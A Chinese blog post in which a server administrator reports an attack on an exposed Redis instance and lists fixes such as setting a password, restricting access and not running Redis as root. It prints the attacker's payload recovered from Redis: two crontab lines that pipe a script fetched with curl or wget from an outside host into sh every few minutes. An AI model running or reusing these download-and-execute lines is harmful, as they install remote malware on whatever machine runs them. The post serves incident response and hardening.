版权声明:本文为博主原创文章,转载请注明引用地址 https://blog.csdn.net/GY325416/article/details/82828489
最近每天都会收到阿里云发的提醒信息,linux异常文件下载,redis安全漏洞
使用可视化工具连接redis,发现有两个key里的value不正常,里面有设置crontab的语句,不知道为什么,redis的value能够设置定时任务,去crontab -e看一下
REDIS0008ú redis-ver^F4.0.11ú
redis-bitsÀ@ú^EctimeÂôR<9b>[ú^Hused-memÂ`+^M^@ú^Laof-preambleÀ^@þ^@û^B^@^@^Gtrojan1@@
*/1 * * * * curl -fsSL http://chrome.zer0day.ru:5050/mrx1 | sh
^@^Gtrojan2@A
*/3 * * * * wget -q -O- http://chrome.zer0day.ru:5050/mrx1 | sh
ÿ)òÈÊa´<87>«
确实是写到了里面,下载并执行了一个文件,我试了一下,这个文件阿里云屏蔽了,不能下载。
尽管如此,这个定时任务,依然会执行,修复方案
- 清除redis可以键
- 设置redis允许访问服务器
- 修改redis端口
- 设置密码
- 不要使用root账户启动redis
- 使用没有登陆权限的账户启动redis(https://blog.csdn.net/GY325416/article/details/81016946)
- 清除/root/.ssh/下的可疑文件,全部删除也行
- 清除/var/spool/cron/root,重启crontab服务
参考:
https://blog.csdn.net/zjcjava/article/details/78558392
https://blog.csdn.net/u012573259/article/details/51803447
https://blog.csdn.net/wayne_primes/article/details/79848720